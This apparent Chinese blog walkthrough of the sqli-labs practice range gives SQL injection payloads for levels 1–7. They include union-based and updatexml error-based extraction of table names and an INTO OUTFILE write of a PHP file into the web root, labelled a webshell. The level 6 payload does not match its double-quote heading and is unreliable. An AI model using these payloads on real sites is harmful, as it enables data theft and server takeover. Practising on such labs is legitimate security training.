sql-labs靶场

第一关(get传参,单引号闭合,有回显,无过滤)

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第二关(get传参,无闭合,有回显,无过滤)

?id=-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')

第三关(get传参,括号加单引号闭合,有回显,无过滤)

?id=-1') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第四关(get传参,括号加双引号闭合,有回显,无过滤)

?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

第五关(get传参,单引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第六关(get传参,双引号闭合,无回显有报错,无过滤)

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

第七关(get传参,单引号加两个括号闭合,无回显有报错,无过滤)写webshell

?id=-1')) union select 1,2,'<?php phpinfo();' into outfile "D:\\phpstudy\\phpstudy_pro\\WWW\\sqli\\Less-7\\a.php" --+

第八关(get传参,单引号闭合,无回显无报错,无过滤)
相关推荐
ZhengEnCi8 小时前
SQL统计查询入门宝典-COUNT-GROUP-BY技术解析
后端·sql
苏打水com8 小时前
企业级数据库实操手册:从架构部署到安全运维的落地指南
数据库·后端
不会kao代码的小王8 小时前
突破机房围墙:openEuler设备的公网管理实战指南
开发语言·数据库·笔记
爱可生开源社区9 小时前
2025 年 9 月《大模型 SQL 能力排行榜》发布,新增 Kimi K2 最新版测评!
sql·llm
盒马coding9 小时前
PostgresWAL文件和序列号
数据库·oracle
一人の梅雨9 小时前
京东商品详情深度解析:从接口调用到商业价值挖掘的技术实现
服务器·数据库·php
xhbh6669 小时前
【实战避坑】MySQL自增主键(AUTO_INCREMENT)全解:从锁机制、间隙问题到分库分表替代方案
android·数据库·mysql·mysql自增主键
hh真是个慢性子9 小时前
mongodb慢查询优化 速度欻欻滴~
数据库·mongodb·性能优化·慢查询
色空大师10 小时前
【MongoDB的RLE压缩数据存储】
数据库·mongodb
安当加密10 小时前
通过TDE透明加密实现人大金仓数据库的免改造存储加密方案
数据库·金仓·透明加密